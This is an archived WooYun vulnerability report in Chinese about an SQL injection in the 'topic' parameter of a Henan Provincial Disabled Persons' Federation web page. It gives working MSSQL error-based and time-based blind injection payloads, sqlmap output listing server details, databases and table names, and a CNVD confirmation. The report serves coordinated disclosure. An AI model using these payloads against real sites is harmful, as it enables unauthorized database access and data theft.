乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-10: 细节已通知厂商并且等待厂商处理中 2015-09-11: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-09-21: 细节向核心白帽子及相关领域专家公开 2015-10-01: 细节向普通白帽子公开 2015-10-11: 细节向实习白帽子公开 2015-10-26: 细节向公众公开
RT
河南省残疾人联合会注入点:**.**.**.**/seach.aspx?ltitle=&mid=0&topic=1get传输,参数:topic注入类型:
Parameter: topic (GET) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: ltitle=&mid=0&topic=-1' AND 4188=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(107)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (4188=4188) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(118)+CHAR(113))) AND 'vIOY'='vIOY Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query) Payload: ltitle=&mid=0&topic=-1' OR 6576=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'Onto'='Onto---web server operating system: Windows 2008 or Vistaweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2008
注入结果:
注入结果:available databases [8]:[*] canlian_test[*] master[*] model[*] msdb[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] webs_ShengCanLian_DBDatabase: webs_ShengCanLian_DB[38 tables]+-----------------------------------------------------+| AboutUsInfo || AdvertiInfo || AreaInfo || ArticleInfo || BadWord || CommodityBuyInfo || CommodityCollectInfo || CommoditySellInfo || CommoditySortInfo || ComputerInfo || DepartmentBase || Dictionary || EverScoreList || GuestBookBase || LinkInfo || MenuInfo || MenuSEOInfo || PT_UserlInfo || Placard || RecoverInfo || RecruitmentBase || RegionBase || ReportInfo || RoleInfo || RoleMenusDetails || UserInfo || UserMessageInfo || WebNews || WebSiteBase || vw_Buy || vw_Commodity_Buy_UserInfo || vw_Commodity_Sell_UserInfo || vw_Commodity_UserInfo || vw_RecoverInfo || vw_ReportInfo || vw_Sell || vw_UserInfo || vw_UserMessageInfo |+-----------------------------------------------------+
就列这些!防水表
如上
过滤过滤
危害等级:高
漏洞Rank:10
确认时间:2015-09-11 13:39
CNVD确认并复现所述情况,已经转由CNCERT下发给河南分中心,由其后续协调网站管理单位处置。
暂无